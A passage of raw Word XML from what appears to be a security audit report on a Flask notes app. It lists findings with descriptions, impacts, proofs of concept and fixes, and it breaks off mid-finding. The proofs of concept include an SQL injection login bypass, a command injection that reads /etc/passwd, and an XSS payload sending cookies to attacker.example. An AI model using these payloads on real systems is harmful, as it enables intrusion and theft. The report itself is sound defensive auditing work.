                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure deployment configuration (debug mode, bind address)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBF0CE" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A6B00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-489 / CWE-605</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Session management weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="FBF0CE" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A6B00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-384</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="8%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">F14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="44%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Missing security response headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="20%"/>
            <w:shd w:fill="DFF0DA" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3A6B35"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="28%"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-693</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F1 — SQL Injection (registration, login, search)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1E1E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="F6DCDC" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-89   ·   app.py — register(), login(), search()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User-supplied values (username, password, search query) are concatenated directly into SQL strings using Python string formatting instead of parameterized queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can alter query logic to read, modify, or delete arbitrary data. In login(), it also enables full authentication bypass — a crafted username such as admin' -- can return a valid user row without knowing the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">username=admin' -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">password=anything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries (? placeholders in sqlite3, or an ORM) for every query that includes user input. Never build SQL with string concatenation or % / f-string formatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F5 — Broken access control — IDOR and missing admin checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1E1E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="F6DCDC" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-639 / CWE-862   ·   app.py — view_note(), admin_ping(), admin_users()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">view_note() fetches a note by ID with no check that it belongs to the requesting user (Insecure Direct Object Reference). admin_ping() has no authorization check at all, and admin_users() only checks that a session exists, not the is_admin flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any authenticated user can read every other user's notes by iterating IDs, run the ping utility, and list every account in the system including who holds admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /notes/1 ... /notes/2 ... /notes/3  (as a non-owner, all return 200)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">GET /admin/users  (as a non-admin, still returns full user list)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce ownership in the data-access query itself (WHERE id = ? AND user_id = ?), and gate every admin route behind a decorator that checks the actual is_admin flag from a trusted source (the DB-backed session), not just session presence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F6 — OS command injection in network diagnostic endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1E1E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="F6DCDC" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-78   ·   app.py — admin_ping()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The host query parameter is interpolated directly into a shell command string executed with subprocess.check_output(..., shell=True).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can chain arbitrary shell commands after the ping, leading to full remote code execution in the context of the web server process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /admin/ping?host=127.0.0.1; cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never pass untrusted input to a shell. Use subprocess.run() with an argument list (no shell=True) and validate the input against a strict allowlist or format (e.g. a verified IP/hostname) before use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F8 — Insecure deserialization via pickle in cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1E1E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="F6DCDC" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-502   ·   app.py — preferences()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User preferences are serialized with pickle and stored client-side in a cookie; on the next request the cookie is deserialized with pickle.loads() with no integrity check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pickle.loads() on attacker-controlled data allows arbitrary object construction and, via a crafted __reduce__ method, arbitrary code execution on the server the moment the cookie is parsed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A crafted pickle payload base64-encoded into the prefs cookie executes attacker-chosen code when any endpoint reads request.cookies['prefs'].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never deserialize untrusted data with pickle. Use JSON for simple structured data, validate the decoded value against an allowlist, and if state must be tamper-proof, use a signed/encrypted format (e.g. itsdangerous) instead of relying on obscurity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F2 — Stored Cross-Site Scripting (XSS) in note viewing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-79   ·   app.py — view_note()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note title/body are inserted into an HTML string via an f-string and rendered with render_template_string, bypassing Jinja's automatic escaping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any user who can create a note can embed &lt;script&gt; content that executes in another user's browser when they view it — enabling session/cookie theft, UI redressing, or actions performed as the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Note body: &lt;script&gt;fetch('https://attacker.example/steal?c='+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Render user content through Jinja templates with autoescaping enabled (the default for render_template with a .html file) rather than building HTML manually with f-strings or render_template_string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F3 — Hardcoded secrets and credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-798   ·   app.py — app.secret_key, REPORTING_DB_PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Flask session-signing key and a service account password are hardcoded string literals committed to source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anyone with source access (including through a leaked repo, backup, or decompiled artifact) can forge session cookies or access the reporting database directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -R "secret_key\|PASSWORD" app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load all secrets from environment variables or a secrets manager (Vault, AWS/GCP Secrets Manager, etc.) at startup, and fail startup if they are missing. Rotate any credential that has ever been committed to source control, even in history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F4 — Weak, unsalted password hashing (MD5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-327 / CWE-916   ·   app.py — hash_password()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
